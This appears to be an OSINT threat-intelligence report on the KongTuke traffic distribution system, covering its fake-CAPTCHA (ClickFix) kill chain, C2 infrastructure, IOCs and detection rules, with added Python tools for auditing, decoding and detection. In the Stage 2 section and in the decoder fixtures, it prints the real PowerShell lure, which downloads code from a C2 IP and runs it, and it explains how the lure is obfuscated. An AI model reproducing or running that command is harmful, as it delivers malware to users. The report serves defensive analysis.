Severity: High | Category: Phishing

KongTuke Investigation Report

Published: March 12, 2026
Threat Actors: SocGholish | Assessment
Tags: phishing, asyncrat, socgholish, social-engineering, c2, botnet, ransomware, apt

GHOST / Breakglass OSINT

Date: 2026-03-09 | Classification: TLP:CLEAR | Status: Complete - Initial Investigation


Executive Summary

KongTuke (aka TAG-124, LandUpdate808, Chaya_002, 404 TDS) is an active Traffic Distribution System (TDS) operating as an Initial Access Broker (IAB) service. It leverages compromised WordPress websites to deliver malware through fake CAPTCHA/ClickFix social engineering lures, ultimately serving ransomware operators including Rhysida, Interlock, 8Base, Akira, and AlphV/BlackCat.

This investigation analyzed 10 MalwareBazaar samples, 100 ThreatFox IOCs, and mapped infrastructure across 39 TDS domains, 25+ C2 IPs, and multiple bulletproof hosting providers. The operation is actively running as of March 9, 2026, with domains registered as recently as March 6, 2026.


What is KongTuke?

KongTuke is NOT a malware payload itself -- it is a Traffic Distribution System that functions as a service:

  1. Compromised WordPress sites are injected with a script tag loading external JS
  2. The JS (served from actor-controlled domains via /js.php or /random.js) evaluates the visitor
  3. Qualifying visitors see a fake CAPTCHA (ClickFix) that copies a PowerShell command to clipboard
  4. The victim pastes and runs the command, which downloads and executes a second-stage payload
  5. The second stage varies by customer -- KongTuke sells infections to multiple ransomware/RAT operators

Business Model

KongTuke operates as an Initial Access as a Service platform, selling infections to:

  • Ransomware affiliates (Rhysida, Interlock, 8Base, Akira, AlphV)
  • RAT operators (Remcos, AsyncRAT, Interlock RAT)
  • Other IABs (SocGholish)
  • Loader operators (MintsLoader, Emmenhtal, D3F@CK Loader)
  • APT groups (TA866/Asylum Ambuscade, TA582)

Kill Chain (from sample analysis)

Stage 1: JavaScript Injection

Compromised WordPress sites contain injected script tags:

<script src="https://<tds-domain>/<random>.js"></script>

The TDS domain also serves js.php which acts as a dynamic payload gate.
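
The following is an added example, not code from this report or from the KongTuke investigation: a small audit script that parses a WordPress page's rendered HTML, lists every external script source whose host is neither the site itself nor on an allowlist, and flags the two TDS path shapes named above (/js.php and /<random4chars>.js). The HTML, the site hostname, the allowlist entries and the tds-example.invalid hostname are all constructed for the demo; none of them are indicators from the report.

```python
"""Audit rendered WordPress HTML for injected third-party script tags.

Added example (not from the report). The sample HTML and hostnames below
are constructed; the TDS host is a placeholder, not an indicator.
"""
import re
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import urlparse

# Path shapes the report attributes to the KongTuke injection layer
TDS_PATH_RE = re.compile(r"^/(js\.php|[a-z0-9]{4}\.js)$", re.IGNORECASE)

# Hypothetical allowlist of known-good CDNs; tune to your own site
DEFAULT_ALLOWLIST = {"cdnjs.cloudflare.com", "ajax.googleapis.com"}


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag on the page."""

    def __init__(self) -> None:
        super().__init__()
        self.sources: List[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.sources.append(value)


def audit_scripts(html: str, site_host: str, allowlist) -> List[Dict[str, object]]:
    """Return one finding per external script whose host is not the site
    itself and not allowlisted. Each finding records whether the path
    matches the report's TDS patterns, which is the high-priority case."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    findings: List[Dict[str, object]] = []
    for src in parser.sources:
        # Protocol-relative sources (//host/x.js) need a scheme to parse
        url = urlparse("https:" + src if src.startswith("//") else src)
        host = (url.hostname or "").lower()
        if not host or host == site_host.lower() or host in allowlist:
            continue  # relative / same-origin / known-good CDN
        findings.append({
            "src": src,
            "host": host,
            "tds_pattern": bool(TDS_PATH_RE.match(url.path)),
        })
    return findings


# Constructed page body: one local script, two allowlisted CDNs, two
# TDS-shaped injections and one unknown tracker.
SAMPLE_HTML = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/lodash/lodash.min.js"></script>
<script src="https://tds-example.invalid/qk3v.js"></script>
<script src="https://tds-example.invalid/js.php"></script>
<script src="https://stats.unknown-vendor.example/tracker.js"></script>
<script src="//ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
</head><body>site content</body></html>"""

if __name__ == "__main__":
    for finding in audit_scripts(SAMPLE_HTML, "victim-site.example", DEFAULT_ALLOWLIST):
        flag = "TDS-PATTERN" if finding["tds_pattern"] else "review"
        print(f"[{flag}] {finding['host']} <- {finding['src']}")
```

Run it against the HTML your web server actually returns (fetch with curl, or dump a page from the database) rather than theme files on disk, since the injection in this campaign is delivered from the compromised PHP files listed under Detection Signatures and only appears in rendered output.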

Stage 2: ClickFix Social Engineering

The victim sees a fake CAPTCHA dialog that copies a PowerShell command to the clipboard. Across the samples the command is obfuscated in one of three ways:

Simple variant (Feb 10, 2026):

powershell.exe -ep bypass -c iex (-join [char[]]@(10,105,119,114,...))

Decodes to: iwr http://142.93.242.144:3456/o -useb | iex

Obfuscated variant (Feb 5, 2026): Uses a ROT-N cipher on the URL (e.g., tffb:// decodes to http:// under ROT-14); the shift value varies per sample.

XOR variant (Jan 28, 2026): Uses byte-level XOR with numeric keys to decode the URL.

Stage 3: Second-Stage Download

All samples download from http://<C2_IP>:3456/<single_letter> (port 3456 is consistent across the fleet). The payload is saved to %APPDATA%\script.ps1, executed, then self-deleted.

Stage 4: Payload Execution

The 7MB sample (e190ad0b) is an Emmenhtal loader -- heavily obfuscated PowerShell using:

  • 56,000+ lines of mathematical junk operations (control flow obfuscation)
  • A 284KB base64-encoded byte array containing the actual payload
  • .NET reflection-based execution via [Type] casting
  • Dynamic method resolution to evade static analysis
  • ClamAV detection: Win.Downloader.Emmenhtal-10044033-0

Stage 5: Final Payload

Based on public reporting, final payloads include:

  • Python-based backdoor (25.5MB package) with scheduled task persistence
  • Figma-impersonating installer (205MB) with RAT capabilities
  • Interlock RAT variant
  • Remcos RAT
  • MintsLoader -> Broomstick/WarmCookie

Infrastructure Map

TDS Domains (JavaScript injection layer) - 39 domains

Active as of March 2026:

Domain             | IP              | First Seen   | Registrar
-------------------|-----------------|--------------|----------
ewar4pres.com      | 178.130.47.124  | Mar 6, 2026  | Unknown
oriana84.com       | 178.130.47.124  | Mar 5, 2026  | NameSilo
cam4fr.com         | 178.130.47.124  | Mar 4, 2026  | NameSilo
road-to-hell.top   | Cloudflare      | Mar 6, 2026  | PDR Ltd
heavens-gate.top   | Cloudflare      | Mar 3, 2026  | PDR Ltd
joseph-stalin.top  | Cloudflare      | Feb 28, 2026 | PDR Ltd
achandograca.com   | 178.130.47.124  | Recent       | Unknown
medipeads.com      | 178.130.47.124  | Recent       | Unknown

Historical (still resolving):

Domain                | IP               | Hosting
----------------------|------------------|---------------------
aacobson.com          | 147.135.84.14    | OVH US
husnikmeat.com        | 147.135.84.14    | OVH US
metavrze.com          | 147.135.84.14    | OVH US
vimsltd.com           | 147.135.84.14    | OVH US
ctpsih.com            | 45.61.136.197    | BL Networks/FranTech
mieyabi.com           | 45.61.136.91     | BL Networks/FranTech
dsourceva.com         | 64.52.80.204     | BL Networks
emierich.com          | 64.52.80.216     | BL Networks
tefalle.com           | 64.94.84.182     | BL Networks
ts4style.com          | 64.94.85.232     | BL Networks
ulaicavr.com          | 64.94.84.109     | BL Networks
netzhit.com           | 64.95.13.241     | BL Networks
stgbran.com           | 64.95.10.178     | BL Networks
benecian.com          | 193.149.187.221  | Unknown (RIPE)
wuliaox.com           | 193.149.189.139  | Unknown (RIPE)
ainttby.com           | 216.245.184.187  | BL Networks
mahleinc.com          | 216.245.184.96   | BL Networks
nicorica.com          | 185.168.208.108  | Unknown
abqsales.com          | 206.71.149.57    | Unknown
foodgefy.com          | 162.33.178.171   | BL Networks
xpertlearninghub.com  | 162.252.174.162  | Namecheap

Additional domains: morasota.top, ms-cleaner.com/org/site/top, auth-ms-service.com/online/top, payload.bruemald.top, app.frugesta.top

C2 Servers (payload delivery) - from sample filenames

IP               | Port | Hosting                 | Samples    | Period
-----------------|------|-------------------------|------------|---------------------
142.93.242.144   | 3456 | DigitalOcean            | 2          | Feb 9-10, 2026
68.183.102.175   | 3456 | DigitalOcean            | 1          | Feb 5, 2026
85.137.253.75    | 3456 | Shinomiya Hosting (UA)  | 1          | Feb 4, 2026
143.198.120.233  | --   | DigitalOcean            | label only | Feb 4, 2026
193.149.176.249  | 3456 | Unknown (RIPE)          | 1          | Jan 28, 2026
144.31.169.1     | 3456 | RIPE                    | 1          | Feb 3, 2026
144.31.238.37    | 3456 | RIPE                    | 2          | Jan 30 - Feb 2, 2026
45.61.139.153    | 80   | BL Networks/FranTech    | 1          | Jan 27, 2026

Botnet C2 IPs (from ThreatFox)

IP               | Port | Purpose
-----------------|------|------------------------------------------
143.110.220.20   | 80   | Botnet C2 (hostname: vpnshieldapp.com)
193.187.151.199  | 80   | Botnet C2
37.27.0.76       | 80   | Botnet C2 (Hetzner)
45.12.2.167      | 80   | Botnet C2 (hostname: LabTestProject.com)

Additional C2s (from malware-traffic-analysis PCAP, Jan 8, 2026)

IP               | Port  | Function                  | Hosting
-----------------|-------|---------------------------|---------------
144.31.221.60    | 80    | Initial payload delivery  | RIPE
144.31.221.71    | 80    | ZIP archive host          | RIPE
45.61.136.222    | 80    | C2 (bz1d0zvfi03yhn1.top)  | BL Networks
64.52.80.153     | 80    | Secondary C2              | BL Networks
173.232.146.62   | 25658 | TLSv1.0 encrypted C2      | Eonix/Servinga
103.27.157.146   | 4444  | TCP backdoor              | qwins.co
64.190.113.206   | 79    | Finger protocol C2        | BL Networks
199.217.98.217   | 80    | Payload delivery          | BL Networks
199.217.99.42    | 80    | Payload delivery          | BL Networks
65.38.120.109    | 80    | Payload delivery          | BL Networks

Infrastructure Clustering

Primary Hosting: BL Networks (Sheridan, WY)

  • ARIN Org: BL Networks (BNL-77)
  • Address: 30 N Gould St, Ste R, Sheridan, WY 82801
  • IP Ranges: 64.52.80.x, 64.94.84-85.x, 64.95.10-13.x, 64.190.113.x, 65.38.120.x, 162.33.177-178.x, 199.217.98-99.x, 216.245.184.x
  • Also via FranTech/PonyNet: 45.61.136-139.x
  • Assessment: BL Networks is the dominant hosting provider for KongTuke infrastructure. The 30 N Gould St address in Sheridan, WY is a well-known address used by shell companies and bulletproof hosting operations.

Secondary Hosting: Global Connectivity Solutions (Haverfordwest, UK)

  • IP: 178.130.47.x
  • Hosts: 4 currently active TDS domains (ewar4pres.com, cam4fr.com, achandograca.com, medipeads.com)
  • Server: Apache/2.4.52 (Ubuntu)

Tertiary Hosting: OVH US

  • IP: 147.135.84.14
  • Hosts: 4 TDS domains (aacobson.com, husnikmeat.com, metavrze.com, vimsltd.com)

Cloud Cover: DigitalOcean

  • IPs: 142.93.242.144, 68.183.102.175, 143.198.120.233, 143.110.220.20
  • Used for ephemeral C2 servers (port 3456)

Operational Security

  • .top domains registered via PDR Ltd (India) with WHOIS privacy
  • .com domains registered via NameSilo and Namecheap
  • Let's Encrypt + Sectigo certificates (automated, free/cheap)
  • C2 domains behind Cloudflare for DDoS protection and IP obfuscation
  • Domains registered 0-3 days before use, rotated frequently
  • Port 3456 used consistently for payload delivery (distinctive fingerprint)
  • ROT cipher and XOR obfuscation varied per sample (shift values change)

Obfuscation Techniques

PowerShell Obfuscation (Stage 2)

  1. Char array encoding: [char[]]@(73,110,118,111,...) -> ASCII codes
  2. ROT-N cipher on URLs: e.g., tffb:// with ROT-14 = http://, shift varies per sample
  3. XOR encoding: Byte arrays XORed with numeric keys
  4. Multi-key XOR: String keys used for filename obfuscation
  5. String-to-char rotation on .NET class names: ApplicationData encoded as EttpmgexmsrHexe (ROT-22)
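
As an added example (not code from the report), the triage helper below undoes the three Stage 2 layers listed above so an analyst can recover the Stage 3 URL from a captured command line: it joins [char[]]@(n,n,...) arrays back into text, brute-forces the ROT-N shift on any scheme-like token (so tffb:// comes back as http:// at shift 14, and the class-name trick EttpmgexmsrHexe reverses at shift 22), and brute-forces a single-byte XOR key. The sample inputs are constructed from the decoded command shown under Stage 2 (iwr http://142.93.242.144:3456/o -useb | iex); the XOR key 0x5A is an arbitrary choice for the demo, not a value recovered from any sample.

```python
"""Triage decoder for the ClickFix PowerShell lures described in this report.

Added example, not code from the report. Sample inputs are constructed
from the report's decoded command; the XOR key below is arbitrary.
"""
import re
from typing import List, Optional, Tuple

CHAR_ARRAY_RE = re.compile(r"\[char\[\]\]\s*@\(\s*([\d\s,]+)\)", re.IGNORECASE)
SCHEME_TOKEN_RE = re.compile(r"[A-Za-z]+://[^\s'\"|)]+")  # any xxxx://... token
URL_RE = re.compile(r"https?://[^\s'\"|)]+", re.IGNORECASE)
# The fleet fingerprint from the report: http://<IP>:3456/<single letter>
KONGTUKE_URL_RE = re.compile(r"^http://(\d{1,3}\.){3}\d{1,3}:3456/[A-Za-z]$")


def decode_char_arrays(cmd: str) -> List[str]:
    """Join every [char[]]@(n,n,...) array in a command line into text."""
    out = []
    for m in CHAR_ARRAY_RE.finditer(cmd):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        out.append("".join(chr(c) for c in codes))
    return out


def rot(text: str, shift: int) -> str:
    """ROT-N over ASCII letters only, preserving case. Digits, ':' and '/'
    pass through, which is why '://' survives the encoding."""
    res = []
    for ch in text:
        if "a" <= ch <= "z":
            res.append(chr((ord(ch) - 97 + shift) % 26 + 97))
        elif "A" <= ch <= "Z":
            res.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        else:
            res.append(ch)
    return "".join(res)


def recover_rot_url(text: str) -> Optional[Tuple[int, str]]:
    """For each scheme-like token (xxxx://...), try all 26 shifts and return
    (shift, url) for the first one that becomes a real http(s) URL. A
    plaintext URL comes back with shift 0."""
    for token in SCHEME_TOKEN_RE.findall(text):
        for shift in range(26):
            candidate = rot(token, shift)
            if URL_RE.fullmatch(candidate):
                return shift, candidate
    return None


def recover_xor_url(data: bytes) -> Optional[Tuple[int, str]]:
    """Single-byte XOR brute force: return (key, text) for the first key
    whose output is printable ASCII containing an http(s) URL."""
    for key in range(1, 256):
        decoded = bytes(b ^ key for b in data)
        if not all(32 <= b < 127 for b in decoded):
            continue
        text = decoded.decode("ascii")
        if URL_RE.search(text):
            return key, text
    return None


def extract_stage3_urls(cmd: str) -> List[str]:
    """End-to-end: decode char arrays, undo ROT-N where needed, and keep
    only URLs that match the report's port-3456 fingerprint."""
    hits = []
    for plain in decode_char_arrays(cmd):
        found = recover_rot_url(plain)
        if found is not None and KONGTUKE_URL_RE.match(found[1]):
            hits.append(found[1])
    return hits


# --- constructed fixtures, modelled on the report's decoded command ---
DECODED_CMD = "iwr http://142.93.242.144:3456/o -useb | iex"
STAGE3_URL = "http://142.93.242.144:3456/o"


def as_char_array_cmd(text: str) -> str:
    """Wrap text in the report's 'simple variant' shape (leading 10 = newline)."""
    codes = ",".join(str(c) for c in [10] + [ord(ch) for ch in text])
    return "powershell.exe -ep bypass -c iex (-join [char[]]@(" + codes + "))"


SAMPLE_CMD = as_char_array_cmd(DECODED_CMD)
# ROT variant: the URL token is stored under ROT-12 so that ROT-14 restores it
ROT_SAMPLE = "iwr " + rot(STAGE3_URL, 12) + " -useb | iex"
SAMPLE_CMD_ROT = as_char_array_cmd(ROT_SAMPLE)
# XOR variant: URL bytes XORed with one numeric key (0x5A chosen arbitrarily)
XOR_SAMPLE = bytes(b ^ 0x5A for b in STAGE3_URL.encode("ascii"))

if __name__ == "__main__":
    print(extract_stage3_urls(SAMPLE_CMD))      # ['http://142.93.242.144:3456/o']
    print(extract_stage3_urls(SAMPLE_CMD_ROT))  # same URL after ROT-14
    print(recover_xor_url(XOR_SAMPLE))          # (90, 'http://142.93.242.144:3456/o')
```

The brute-force approach is deliberate: because the shift and XOR key change per sample, hard-coding ROT-14 would miss the next lure, whereas scanning all 26 shifts (or 255 keys) and stopping at the first output that is a syntactically valid http(s) URL generalises across the variants the report lists.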

PowerShell Obfuscation (Stage 4 - Emmenhtal Loader)

  1. 56,000+ lines of junk math operations (dead code)
  2. 284KB base64 byte array containing encrypted payload
  3. .NET reflection via [Type] casting to resolve classes dynamically
  4. Multi-layer encoding: Base64 -> XOR -> .NET Assembly -> Execute
  5. Long variable names (30+ chars) to impede manual analysis
  6. File size inflation: 7.5MB to evade sandbox timeouts

Attribution Assessment

Operator Identity

KongTuke/TAG-124 operates as a shared service (Malware-as-a-Service / Initial Access Broker). Key indicators:

  1. Infrastructure scale (300+ compromised WordPress sites, 40+ TDS domains) suggests an organized operation
  2. BL Networks hosting cluster (Sheridan, WY shell company) indicates awareness of bulletproof hosting
  3. Domain registration patterns: PDR Ltd (India), NameSilo, Namecheap -- cheap, privacy-enabled registrars
  4. Rapid domain rotation: New domains every 1-3 days, with certificates provisioned same day
  5. Multiple customer payloads: Different final-stage malware families indicate a TDS-for-hire model

Customer Base

  • Rhysida ransomware (confirmed by Recorded Future)
  • Interlock ransomware (confirmed by DFIR Report)
  • TA866/Asylum Ambuscade (confirmed by Recorded Future)
  • SocGholish (confirmed by Recorded Future)
  • 8Base, Akira, AlphV/BlackCat (assessed by community reporting)

Connection to Shinomiya Hosting

The C2 IP 85.137.253.75 resolves to de-14.hosted-by.shinomiya-hosting.com with RIPE registration to Mykyta Skorobohatko (Ukraine). This may indicate a Ukrainian connection in the operator or infrastructure chain.


Victims

Compromised WordPress Sites (injection targets)

Recorded Future identified 300+ compromised WordPress sites including:

  • www.ecowas.int - Economic Community of West African States
  • www.pcbc.gov.pl - Polish Centre for Testing and Certification
  • bianchilawgroup.com - US law firm (confirmed by Recorded Future)
  • Hundreds of smaller businesses and organizations globally

End Victims (infected users)

Users who interact with the fake CAPTCHA and execute the PowerShell command. Based on the kill chain:

  • Windows users visiting any of 300+ compromised websites
  • English-language targeting primarily
  • Final impact depends on the customer payload: ransomware, RAT, infostealer

IOC Summary

Hashes (MalwareBazaar samples)

SHA256                                                           | Type                   | First Seen
-----------------------------------------------------------------|------------------------|-------------
e190ad0b45882fdd19e62883151803a32adb148e8eb7475f1b316a00d9ecc82f | PS1 (7.5MB Emmenhtal)  | Mar 2, 2026
3143d90eae4bdce90b538652cefc1ba92a69856a77cbe33a6947120c6d0fe3ca | PS1 (219B)             | Feb 10, 2026
ca6a5f4df6d679ca7f465eaea20660f69e946c4d215b34b270891afac5833f08 | PS1 (4.9KB)            | Feb 9, 2026
f3b81538a4127a0ae33f144d591c4bde03c027c077ce6a5251be14dfe34dc0c4 | PS1 (4.9KB)            | Feb 5, 2026
8d52d6d62dfb318520ccc16a9a7fcce4ae83bc528c0ea030498d873a1e8fc7cd | PS1 (4.9KB)            | Feb 4, 2026
478aed491279bc953ecee8cc7edc569d25c6bd386057f0bbf78486eae9c76275 | PS1 (4.9KB)            | Feb 3, 2026
2e7a78d5d6abde8be81283091ed5ad12458b99cc5d4d685b613981d4e76aa928 | PS1 (4.9KB)            | Feb 2, 2026
110c1528c63451a376d49ddf272e9922ffb38798e1fabf385d3f85164127130a | PS1 (4.9KB)            | Jan 30, 2026
942129efbabdc7b66276823d9b195b2d05c08defbb6a0db7c145ebb339574927 | PS1 (4.9KB)            | Jan 28, 2026
167b65a36d6db71056be8ccfc8fc361bb9e2e073942ee85b9d8132db2f2849d4 | PS1 (4.9KB)            | Jan 27, 2026

Detection Signatures

  • ClamAV: Win.Downloader.Emmenhtal-10044033-0
  • URL pattern: http://<IP>:3456/<single_letter>
  • PowerShell pattern: powershell.exe -ep bypass -c iex (-join [char[]]@(
  • WordPress injection paths: /wp-admin/images/wfgth.php, /wp-includes/pomo/update.php
  • URL parameter artifact: "refferer" (misspelling of "referer")
  • TDS URL patterns: /<random4chars>.js, /js.php
  • File drop: %APPDATA%\script.ps1

Recommendations

  1. Block all identified IPs and domains at firewall/proxy level
  2. Monitor for PowerShell execution with -ep bypass and [char[]]@( patterns
  3. Audit WordPress instances for injected script tags pointing to unknown domains
  4. Block BL Networks IP ranges (64.52.80.0/24, 64.94.84.0/23, 64.95.10.0/23, etc.) if not needed
  5. Monitor for port 3456 outbound connections as a distinctive KongTuke fingerprint
  6. Deploy YARA rules for Emmenhtal loader patterns (large PS1 files with byte arrays and .NET reflection)
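
To show how the Detection Signatures and recommendations 2, 3 and 5 translate into detection logic, the following is an added example (not code from the report): a small rule set run over constructed log lines. The log format (a source name followed by key=value pairs) is an assumption made for the demo, the IPs come from the 203.0.113.0/24 documentation range, and tds-example.invalid / victim-site.example are placeholders; the patterns themselves (-ep bypass with a [char[]]@( array, port 3456 with a single-letter path, %APPDATA%\script.ps1, the two WordPress injection paths and the "refferer" typo) are the ones the report lists.

```python
"""Detection rules for the KongTuke indicators listed in this report.

Added example, not code from the report. The 'source k=v ...' log shape
and all sample lines are constructed; adapt parse_line() to your telemetry.
"""
import re
from typing import Dict, List

# Behavioural indicators from the report's Detection Signatures section
PS_LURE_RE = re.compile(r"powershell(\.exe)?\s.*-ep\s+bypass.*\[char\[\]\]\s*@\(", re.IGNORECASE)
PORT_3456_URL_RE = re.compile(r"^https?://(\d{1,3}\.){3}\d{1,3}:3456/[A-Za-z](\?|$)")
SCRIPT_DROP_RE = re.compile(r"(\\AppData\\Roaming|%APPDATA%)\\script\.ps1$", re.IGNORECASE)
WP_INJECT_PATHS = ("/wp-admin/images/wfgth.php", "/wp-includes/pomo/update.php")
REFFERER_RE = re.compile(r"[?&]refferer=", re.IGNORECASE)


def parse_line(line: str) -> Dict[str, str]:
    """Split 'source k=v k="v v"' into a dict; the first token is the source."""
    src, _, rest = line.strip().partition(" ")
    fields = {"_source": src}
    for m in re.finditer(r'(\w+)=("([^"]*)"|(\S+))', rest):
        fields[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(4)
    return fields


def evaluate(fields: Dict[str, str]) -> List[str]:
    """Return the names of every rule that fires on one parsed event."""
    hits = []
    cmd = fields.get("cmdline", "")
    url = fields.get("url", "")
    path = fields.get("path", "")
    if PS_LURE_RE.search(cmd):
        hits.append("clickfix_powershell_chararray")   # recommendation 2
    if fields.get("dst_port") == "3456":
        hits.append("outbound_tcp_3456")               # recommendation 5
    if PORT_3456_URL_RE.match(url):
        hits.append("kongtuke_port3456_payload_url")   # URL pattern signature
    if SCRIPT_DROP_RE.search(path):
        hits.append("appdata_script_ps1_drop")         # file drop signature
    if any(p in url for p in WP_INJECT_PATHS):
        hits.append("wordpress_injection_path")        # recommendation 3
    if REFFERER_RE.search(url):
        hits.append("tds_refferer_typo")               # URL parameter artifact
    return hits


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run every rule over every line; return only the lines that fired."""
    results = []
    for line in lines:
        fields = parse_line(line)
        hits = evaluate(fields)
        if hits:
            results.append({"source": fields["_source"], "rules": hits, "line": line})
    return results


# Constructed telemetry: six lines that should fire, two benign ones that should not
SAMPLE_LOGS = [
    'sysmon event=1 image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'cmdline="powershell.exe -ep bypass -c iex (-join [char[]]@(10,105,119,114))"',
    'sysmon event=3 image="powershell.exe" dst_ip=203.0.113.10 dst_port=3456',
    'proxy method=GET url="http://203.0.113.10:3456/o" status=200',
    'sysmon event=11 image="powershell.exe" path="C:\\Users\\alice\\AppData\\Roaming\\script.ps1"',
    'webserver method=POST url="/wp-admin/images/wfgth.php" status=200',
    'proxy method=GET url="https://tds-example.invalid/js.php?refferer=victim-site.example" status=200',
    'sysmon event=1 image="powershell.exe" cmdline="powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"',
    'proxy method=GET url="https://www.example.com/index.html" status=200',
]

if __name__ == "__main__":
    for r in scan(SAMPLE_LOGS):
        print(r["source"], ",".join(r["rules"]))
```

The port-3456 rule is kept separate from the URL-pattern rule on purpose: the proxy sees the full URL, but the endpoint only sees the TCP connection, so both layers get a rule and an analyst can correlate them by host and time. The benign PowerShell line at the end demonstrates why the rule requires both -ep bypass and the [char[]]@( array rather than alerting on every PowerShell launch.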

GHOST / Breakglass OSINT - Investigation completed 2026-03-09
